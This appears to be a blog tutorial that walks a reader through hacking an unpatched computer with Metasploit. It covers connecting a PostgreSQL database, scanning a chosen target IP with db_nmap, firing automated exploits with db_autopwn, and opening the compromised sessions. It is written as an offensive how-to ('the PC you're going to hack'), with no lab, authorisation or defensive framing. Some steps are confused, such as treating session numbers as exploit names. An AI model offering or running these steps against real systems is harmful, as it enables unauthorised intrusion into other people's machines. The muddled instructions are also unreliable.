In this tutorial you'll need
- Metasploit
- postgresql
Also: This only works on unpatched computer clients. So this tutorial will not work everytime, depending on the type of PC you're going to hack.
Metasploit is constantly updated, and there are in fact working remote exploits for newer OSes in it.
HOWEVER, not all systems will be vulnerable due to a router, firewall, or something else in the way.
Furthermore, a fully patched system will of course be safe against MSF, as MSF is a public tool using a collection of public exploits.
Make sure you download the right programs with your OS system. ( The one which you're currently supporting on your PC )
1. First you want to open up postgresql
Once it's open click
Code:
Start --> All Programs --> PostgreSQL 9.0 --> pgAdmin III
Then right click on your server and click connect. Remember to keep this open the whole time, otherwise it will fail and you'll have to restart again.
Now it's time to start. First
Start -- > All Programs --> Metasploit Framework
once you're there open up Metasploit gui.
Now in the CMD window type
db_connect postgres: ThePassYouChose@localhost:5432
Once you've connected type in
db_host
to make sure you've actually connected to the server.
If that is correct then type in
db_nmap 127.0.0.1
IMPORTANT NOTE: Where I typed 127.0.0.1 replace that with the IP you want to hack.
Now it's time to exploit shit.
Let's start. First type in
db_autopwn -t -p -e -s -b
It will start. This will take a while, so just wait.
Once it's done type in
sessions -l
to see what the scanner found. If it worked you should see a list of exploits :D
Now once you've got the exploits to hack the computer, you'll notice, that they're all numbed, and they names.
Just pick a name from the list and type in
sessions -i YOUR EXPLOIT NAME HERE
Or for a better example
sessions -i ExploitNumber
Whatever command you want to do remember to put
sessions -i
Good luck
0 comments:
Post a Comment